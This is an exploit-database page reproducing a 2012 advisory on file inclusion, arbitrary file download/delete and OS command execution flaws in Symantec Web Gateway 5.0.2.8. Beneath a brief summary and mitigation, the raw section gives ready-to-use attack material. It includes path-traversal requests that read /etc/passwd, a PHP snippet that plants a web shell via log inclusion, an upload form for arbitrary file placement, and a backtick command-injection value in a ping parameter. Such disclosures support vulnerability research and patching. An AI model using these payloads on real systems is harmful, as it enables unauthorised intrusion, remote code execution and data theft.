header-logo
Suggest Exploit
vendor:
Web Gateway
by:
S2 Crew [Hungary]
8,8
CVSS
HIGH
File Include and OS Command Execution
20
CWE
Product Name: Web Gateway
Affected Version From: 5.0.2.8
Affected Version To: 5.0.2.8
Patch Exists: YES
Related CWE: CVE-2012-0297, CVE-2012-0298
CPE: a:symantec:web_gateway:5.0.2.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2012

Symantec Web Gateway File Include and OS Command Execution Vulnerability

A vulnerability in Symantec Web Gateway 5.0.2.8 allows an attacker to include a remote file and execute OS commands. This is due to the application not properly validating user-supplied input. An attacker can leverage this vulnerability to gain access to sensitive information and execute arbitrary code on the server. The vulnerability is present in the previewProxyError.php and releasenotes.php scripts, which allow an attacker to include a remote file and execute OS commands. Additionally, the application allows an attacker to download and delete arbitrary files, as well as execute arbitrary code via the uploadFile.php and remoteRepairs.php scripts.

Mitigation:

The vendor has released a patch to address this vulnerability. Additionally, users should ensure that all user-supplied input is properly validated and that the application is running the latest version.
Source

Exploit-DB raw data:

Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
        You can execute OS commands just include the error_log:
        /usr/local/apache2/logs/
        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log
        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log

        Make a connection to port 80:
        <?php
        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
        $cmd = "<?php system(\$_GET['cmd']); ?>";
        fputs($f,$cmd);
        fclose($f);
		print "Shell creation done<br>";
        ?>

Arbitary file download and delete:
        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
	d parameter: the complete filename 
        After the download process application removes the original file with root access! :)

        Command execution methods:
        1.Method
        Download and delete the /var/www/html/ciu/.htaccess file.
        After it you can access the ciu interface on web.
        There is an upload script: /ciu/uploadFile.php
	User can control the filename and the upload location:
        $_FILES['uploadFile'];
        $_POST['uploadLocation'];

        2.Method
        <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="uploadFile">
        <input type="text" name="action" value="upload">
        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
        <input type="hidden" name="configuration" value="test">
        <input type="submit" value="upload!">
        </form>
	
	The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication:

        http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)

        From the modified POST message:
        Content-Disposition: form-data; name="pingaddress"
        127.0.0.1`whoami>/tmp/1234.txt`

Navigation

Suggest Exploit

Services By CQR